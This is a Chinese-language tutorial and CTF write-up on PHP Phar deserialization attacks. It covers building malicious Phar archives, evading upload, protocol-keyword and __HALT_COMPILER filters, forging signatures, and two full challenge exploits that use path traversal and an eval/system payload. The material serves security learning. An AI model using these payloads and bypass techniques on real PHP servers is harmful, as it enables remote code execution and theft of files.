了解 Phar1
Phar 含义2
可以认为 Phar 是 PHP 的压缩文档,是 PHP 中类似于 JAR 的一种打包文件。它可以把多个文件存放至同一个文件中,无需解压,PHP 就可以进行访问并执行内部语句。
默认开启版本 PHP version >= 5.3
Phar 文件结构3
Phar 文件结构可大致分为四个部分,官方文档介绍如下图
简单来说就是
1、Stub//Phar文件头 2、manifest//压缩文件信息 3、contents//压缩文件内容 4、signature//签名
具体如下
Stub4
Stub 是 Phar 的文件标识,也可以理解为它就是 Phar 的文件头
这个 Stub 其实就是一个简单的 PHP 文件,它的格式具有一定的要求,具体如下
xxx<?php xxx; __HALT_COMPILER();?>
这行代码的含义,也就是说前面的内容是不限制的,但在该 PHP 语句中,必须有 __HALT_COMPILER(),没有这个,PHP 就无法识别出它是 Phar 文件。
这个其实就类似于图片文件头,比如 gif 文件没有 GIF89A文件头就无法正确的解析图片
manifest5
a manifest describing the contents,用于存放文件的属性、权限等信息。
这里也是反序列化的攻击点,因为这里以序列化的形式存储了用户自定义的 Meta-data
contents6
the file contents,这里用于存放 Phar 文件的内容
signature7
[optional] a signature for verifying Phar integrity (phar file format only),签名(可选参数),位于文件末尾,具体格式如下
从官方文档中不难看出,签证尾部的 01代表 md5 加密,02代表 sha1 加密,04代表 sha256 加密,08代表 sha512 加密
简单的举个栗子
用 010editor 打开 Phar 文件
当我们修改文件的内容时,签名就会变得无效,这个时候需要更换一个新的签名
更换签名的脚本
from hashlib import sha1 with open('test.phar', 'rb') as file: f = file.read() s = f[:-28] # 获取要签名的数据 h = f[-8:] # 获取签名类型和GBMB标识 newf = s + sha1(s).digest() + h # 数据 + 签名 + (类型 + GBMB) with open('newtest.phar', 'wb') as file: file.write(newf) # 写入新文件
反序列化
成因
Phar 之所以能反序列化,是因为 Phar 文件会以序列化的形式存储用户自定义的 meta-data,PHP 使用 phar_parse_metadata在解析 meta 数据时,会调用 php_var_unserialize进行反序列化操作。具体解析代码
int phar_parse_metadata(char **buffer, zval *metadata, uint32_t zip_metadata_len){ php_unserialize_data_t var_hash; if (zip_metadata_len) { const unsigned char *p; unsigned char *p_buff = (unsigned char *)estrndup(*buffer, zip_metadata_len); p = p_buff; ZVAL_NULL(metadata); PHP_VAR_UNSERIALIZE_INIT(var_hash); if (!php_var_unserialize(metadata, &p, p + zip_metadata_len, &var_hash)) { efree(p_buff); PHP_VAR_UNSERIALIZE_DESTROY(var_hash); zval_ptr_dtor(metadata); ZVAL_UNDEF(metadata); return FAILURE; } efree(p_buff); PHP_VAR_UNSERIALIZE_DESTROY(var_hash); } }
demo
生成 Phar 文件
需要去检查一下 php.ini 中的 phar.readonly 选项,如果是 On,需要修改为 Off。
Phar 文件生成的话,可以用如下代码生成
<?php class test{ public $name="qwq"; function __destruct() { echo $this->name . " is a web vegetable dog "; } } $a = new test(); $a->name="quan9i"; $tttang=new phar('tttang.phar',0);//后缀名必须为phar $tttang->startBuffering();//开始缓冲 Phar 写操作 $tttang->setMetadata($a);//自定义的meta-data存入manifest $tttang->setStub("<?php __HALT_COMPILER();?>");//设置stub,stub是一个简单的php文件。PHP通过stub识别一个文件为PHAR文件,可以利用这点绕过文件上传检测 $tttang->addFromString("test.txt","test");//添加要压缩的文件 $tttang->stopBuffering();//停止缓冲对 Phar 归档的写入请求,并将更改保存到磁盘 ?>
该如何触发反序列化呢,一般是配合 Phar,此时可以不借助 unserialize()直接进行反序列化操作。Phar 属于伪协议,伪协议使用较多的是一些文件操作函数,如 fopen()、copy()、file_exists()等,具体如下图
反序列化
前面在描述反序列化成因时提到过,是因为解析 Phar 文件时对 Meta 进行了反序列化,接下来本地测试一下,测试是否能成功触发。
测试代码
<?php class test{ public $name=""; public function __destruct() { eval($this->name); } } $tttang = file_get_contents('phar://tttang.phar/test.txt'); echo $tttang;
test 是之前写入 test.txt 的内容,quan9i 是之前在 Phar 文件中设置的 name名
条件8
利用条件有以下几个
1、phar文件能够上传至服务器 //即要求存在file_get_contents()、fopen()这种函数 2、要有可利用的魔术方法 //这个的话用一位大师傅的话说就是利用魔术方法作为"跳板" 3、文件操作函数的参数可控,且:、/、phar等特殊字符没有被过滤 //一般利用姿势是上传Phar文件后通过伪协议Phar来实现反序列化,伪协议Phar格式是`Phar://`这种,如果这几个特殊字符被过滤就无法实现反序列化
绕过方式9
存在漏洞,就会存在防护,通常针对 Phar 反序列化也是有防范的。这里简单的总结一下常见的绕过方式。
更改文件格式10
我们利用 Phar 反序列化的第一步就是需要上传 Phar 文件到服务器,而如果服务端存在防护,比如这种
$_FILES["file"]["type"]=="image/gif"
要求文件格式只能为 gif,这个时候我们该怎么办呢?
这个时候我们需要朝花夕拾,重提一下 PHP 识别 Phar 文件的方式。PHP 通过 Stub里的 __HALT_COMPILER();来识别这个文件是 Phar 文件,对于其他是无限制的,这个时候也就意味着我们即使对文件后缀和文件名进行更改,其实质仍然是 Phar 文件。
示例代码
<?php class Test { public $name; function __construct(){ echo "I am".$this->name."."; } } $obj = new Test(); $obj -> name = "quan9i"; $phar = new Phar('test.phar'); $phar -> startBuffering(); //开始缓冲 Phar 写操作 $phar -> setStub('GIF89a<?php __HALT_COMPILER();?>'); //设置stub,添加gif文件头 $phar ->addFromString('test.txt','test'); //要压缩的文件 $phar -> setMetadata($obj); //将自定义meta-data存入manifest $phar -> stopBuffering(); ////停止缓冲对 Phar 归档的写入请求,并将更改保存到磁盘 ?>
在浏览器上访问此文件生成 test.phar 文件,用 010editor 查看
随便找一个分析文件格式的
变成 Gif 格式,这种上传一般可以绕过大多数上传检测。
绕过 Phar 关键字检测11
Phar 反序列化中,我们一般思路是上传 Phar 文件后,通过给参数赋值为 Phar://xxx来实现反序列化,而一些防护可能会采取禁止参数开头为 Phar 等关键字的方式来防止 Phar 反序列化,示例代码如下
if (preg_match("/^php|^file|^phar|^dict|^zip/i",$filename){ die(); }
绕过的话,我们的办法是使用各种协议来进行绕过,具体如下
1、php://filter/read=convert.base64-encode/resource=phar://test.phar //即使用filter伪协议来进行绕过 2、compress.bzip2://phar:///test.phar/test.txt //使用bzip2协议来进行绕过 3、compress.zlib://phar:///home/sx/test.phar/test.txt //使用zlib协议进行绕过
绕过__HALT_COMPILER 检测12
我们在前文初识 Phar 时就提到过,PHP 通过 __HALT_COMPILER来识别 Phar 文件,那么出于安全考虑,即为了防止 Phar 反序列化的出现,可能就会对这个进行过滤,示例代码如下
if (preg_match("/HALT_COMPILER/i",$Phar){ die(); }
这里的话绕过思路有两个
1、将 Phar 文件的内容写到压缩包注释中,压缩为 zip 文件,示例代码如下
<?php $a = serialize($a); $zip = new ZipArchive(); $res = $zip->open('phar.zip',ZipArchive::CREATE); $zip->addFromString('flag.txt', 'flag is here'); $zip->setArchiveComment($a); $zip->close(); ?>
2、将生成的 Phar 文件进行 gzip 压缩,压缩命令如下
gzip test.phar
效果如下
压缩后同样也可以进行反序列化
实战13
[CISCN2019 华北赛区 Day1 Web1]Dropbox14
打开靶场
发现是个登录界面,可以进行注册,随便注册一下登录
登录后发现仅存在一个文件上传
抓下包,尝试上传文件
发现有过滤,这里尝试用修改 Content-Type来实现绕过
成功上传,查看网页界面
发现只存在下载和删除两个功能,抓一下下载的包
这个参数感觉有点东西,尝试读取一下其他文件
filename=/etc/passwd
此时想的是直接读取 Flag 文件,但尝试读取 Flag 文件后无果(未找到 flag.php 文件),只能从其他方面着手,这里我们发现存在下载和删除功能,盲猜有 download.php和 delete.php文件
filename=../../download.php filename=../../delete.php
# download.php <?php session_start(); if (!isset($_SESSION['login'])) { header("Location: login.php"); die(); } if (!isset($_POST['filename'])) { die(); } include "class.php"; ini_set("open_basedir", getcwd() . ":/etc:/tmp"); chdir($_SESSION['sandbox']); $file = new File(); $filename = (string) $_POST['filename']; if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) { Header("Content-type: application/octet-stream"); Header("Content-Disposition: attachment; filename=" . basename($filename)); echo $file->close(); } else { echo "File not exist"; } ?>
# delete.php <?php session_start(); if (!isset($_SESSION['login'])) { header("Location: login.php"); die(); } if (!isset($_POST['filename'])) { die(); } include "class.php"; chdir($_SESSION['sandbox']); $file = new File(); $filename = (string) $_POST['filename']; if (strlen($filename) < 40 && $file->open($filename)) { $file->detele(); Header("Content-type: application/json"); $response = array("success" => true, "error" => ""); echo json_encode($response); } else { Header("Content-type: application/json"); $response = array("success" => false, "error" => "File not exist"); echo json_encode($response); } ?>
发现这两个文件都包含了 class.php,因此我们再查看一下 class.php文件
//原文过程,这里缩减了很多,只截取了用到的部分 <?php error_reporting(0); $dbaddr = "127.0.0.1"; $dbuser = "root"; $dbpass = "root"; $dbname = "dropbox"; $db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname); class User { public $db; public function __construct() { global $db; $this->db = $db; } public function __destruct() { $this->db->close(); } } class FileList { private $files; private $results; private $funcs; public function __construct($path) { $this->files = array(); $this->results = array(); $this->funcs = array(); $filenames = scandir($path); $key = array_search(".", $filenames); unset($filenames[$key]); $key = array_search("..", $filenames); unset($filenames[$key]); } public function __call($func, $args) { array_push($this->funcs, $func); foreach ($this->files as $file) { $this->results[$file->name()][$func] = $file->$func(); } } public function __destruct() { $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">'; $table .= '<thead><tr>'; foreach ($this->funcs as $func) { $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>'; } $table .= '<th scope="col" class="text-center">Opt</th>'; $table .= '</thead><tbody>'; foreach ($this->results as $filename => $result) { $table .= '<tr>'; foreach ($result as $func => $value) { $table .= '<td class="text-center">' . htmlentities($value) . '</td>'; } $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>'; $table .= '</tr>'; } echo $table; } } class File { public $filename; public function open($filename) { $this->filename = $filename; if (file_exists($filename) && !is_dir($filename)) { return true; } else { return false; } } public function close() { return file_get_contents($this->filename); } } ?>
这里的话我们注意到 class.php 中 File类的 close()方法,它里面用到了 file_get_contents,题目描述了是 Phar,那这里大概率是一个突破口,那此时我们就去尝试寻找,谁可以调用这个 close方法,最终在 User类中的 __destruct方法中发现 $this->db->close();,这里调用了 close方法,但我们需要用的这个 close方法是在 File类中的,这个时候该怎么办呢,我们在 Filelist类中发现有一个 __call方法,_call方法是当访问不可访问的方法时触发,这个时候如果我们传入 file,它就会由于 Filelist中没有 close类而调用 _call方法,此时就会调用 File类里的 _call方法,然后将结果存到 results[$file->name()][$func]中,当 Filetest销毁时,触发 __destruct,此时结果也被打印出来,也就将其中的内容打印了出来
这个是逆推的,那么正推的话也就相对来说更简单了
1、创建User对象->指向Filetest 2、调用Filetest类->让它指向File类,因为没有close方法,所以调用__call方法,然后转向File类执行close方法 3、成功调用File类中的close方法,将结果存到results[$file->name()][$func]中 4、Filetest类销毁时触发__destruct魔术方法,输出results中的内容
EXP 如下
<?php class User { public $db; public function __construct() { $this->db = "new Filelist()"; } } class FileList{ private $files; public function __construct(){ $this -> files = array(new File()); } } class File { public $filename = '/flag.txt'; } $a = new User(); $phar = new Phar('quan9i.phar'); $phar->startBuffering(); $phar->addFromString('test.txt', 'test'); $phar->setStub('<?php __HALT_COMPILER(); ? >'); $phar->setMetadata($a); $phar->stopBuffering(); ?>
抓文件上传的包,修改 Content-type为 image/png,此时再发包
成功上传,接下来去抓删除文件的包,使用 phar 伪协议来触发反序列化
成功获取 Flag
[NSSRound#4 SWPU]1zweb15
题目环境 https://www.ctfer.vip/problem/2484
进入靶场,发现有个查询文件和上传文件界面,尝试任意文件读取
upload.php
#upload.php <?php if ($_FILES["file"]["error"] > 0){ echo "上传异常"; } else{ $allowedExts = array("gif", "jpeg", "jpg", "png"); $temp = explode(".", $_FILES["file"]["name"]); $extension = end($temp); if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){ $content=file_get_contents($_FILES["file"]["tmp_name"]); $pos = strpos($content, "__HALT_COMPILER();"); if(gettype($pos)==="integer"){ echo "ltj一眼就发现了phar"; }else{ if (file_exists("./upload/" . $_FILES["file"]["name"])){ echo $_FILES["file"]["name"] . " 文件已经存在"; }else{ $myfile = fopen("./upload/".$_FILES["file"]["name"], "w"); fwrite($myfile, $content); fclose($myfile); echo "上传成功 ./upload/".$_FILES["file"]["name"]; } } }else{ echo "dky不喜欢这个文件 .".$extension; } }
分析一下这个上传文件
1、限制文件后缀,只能为gif、jpeg、jpg、png 2、检测了文件内容,意味着不能出现__HALT_COMPILER();
对于限制文件后缀,我们这里更改文件后缀即可,对于第二个,前文在简述绕过方法时也提到过,这种情况可以将 Phar 文件进行 gzip压缩,从而实现绕过。
接下来查看一下 index.php
#index.php <?php class LoveNss{ public $ljt; public $dky; public $cmd; public function __construct(){ $this->ljt="ljt"; $this->dky="dky"; phpinfo(); } public function __destruct(){ if($this->ljt==="Misc"&&$this->dky==="Re") eval($this->cmd); } public function __wakeup(){ $this->ljt="Re"; $this->dky="Misc"; } } $file=$_POST['file']; if(isset($_POST['file'])){ echo file_get_contents($file); }
这里的话不难看出利用点是 __destruct中的 eval函数,而这里要求 $this->ljt==="Misc"&&$this->dky==="Re",也就是说
__wakeup()函数不能执行,否则就达不到要求,即我们需要绕过__wakeup()
我们知道属性大于实际个数可以绕过 __wakeup函数,那么我们这里就可以采取这种方式来进行绕过。
构造 Phar 文件
<?php class LoveNss{ public $ljt; public $dky; public $cmd; public function __construct(){ $this->ljt="Misc"; $this->dky="Re"; $this->cmd="system('cat /flag');"; } } $phar = new Phar('quan9i.phar'); $phar->startBuffering(); $phar->setStub('GIF89a'.'<?php __HALT_COMPILER(); ? >'); $a = new LoveNss(); $phar->setMetadata($a); $phar->addFromString('test.txt', 'test'); $phar->stopBuffering(); ?>
此时 Phar 文件生成了,接下来就需要绕过了,这里还需要说明一下,就是当我们更改 Phar 文件的内容时,签名此时就会变无效,因此这里我们需要再构造一个新的签名。
步骤总的来说就是以下四步
1、更改属性值来绕过__wakeup函数 2、更改签名 2、进行gzip压缩来绕过关键字检测 4、更改文件后缀
我们可以利用一个简单的脚本来实现一下
import gzip from hashlib import sha1 with open('D:\\phpStudy\\PHPTutorial\\WWW\html\\quan9i.phar', 'rb') as file: f = file.read() s = f[:-28] # 获取要签名的数据 s = s.replace(b'3:{', b'4:{')#更换属性值,绕过__wakeup h = f[-8:] # 获取签名类型以及GBMB标识 newf = s + sha1(s).digest() + h # 数据 + 签名 + (类型 + GBMB) #print(newf) newf = gzip.compress(newf) #对Phar文件进行gzip压缩 with open('D:\\phpStudy\\PHPTutorial\\WWW\\html\\newquanqi.png', 'wb') as file:#更改文件后缀 file.write(newf)
接下来上传文件
通过 Phar 伪协议即可获取到 Flag
Phar 扩展16
MySQL Phar 反序列化17
LOAD DATA LOCAL INFILE会触发 php_stream_open_wrapper,当我们将它放置到 Phar 文件中的时候,也会触发反序列化
先来简述一下 LOAD DATA LOCAL INFILE,它是通过文件批量向表中插入内容的,常用语句如下
LOAD DATA LOCAL INFILE '1.txt' into table user;
可能语言描述有点抽象,这里用 Navicat演示一下其作用
这个是语句的正常用法
而当这个文件是经过 Phar 协议的 Phar 文件时,此时调用会出现 warning,LOAD DATA LOCAL INFILE forbidden
这个是因为我们需要手动修改一下 my.ini 下的一些配置,也就是说这个是调用的前提,具体如下
local-infile=1 secure_file_priv=""
demo18
生成 Phar 文件
#q.php <?php class TestObject{ public $data; function __destruct(){ } } $phar = new Phar('quan9i.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ? >'); $a = new TestObject(); $a->data="test"; $phar->setMetadata($a); $phar->addFromString('test.txt', 'test'); $phar->stopBuffering(); ?>
访问 q.php 后生成 quan9i.phar 文件,接下来利用语句来调用 Phar 文件
#1.php <?php class TestObject{ public $data; function __destruct(){ echo $this->data; } } $m = mysqli_init(); mysqli_options($m, MYSQLI_OPT_LOCAL_INFILE, true); $s = mysqli_real_connect($m, 'localhost', 'root', 'root', 'test', 3306); $p = mysqli_query($m, 'LOAD DATA LOCAL INFILE \'phar://quan9i.phar/test.txt\' INTO TABLE test'); ?>
欢迎来到这里!
我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。
注册 关于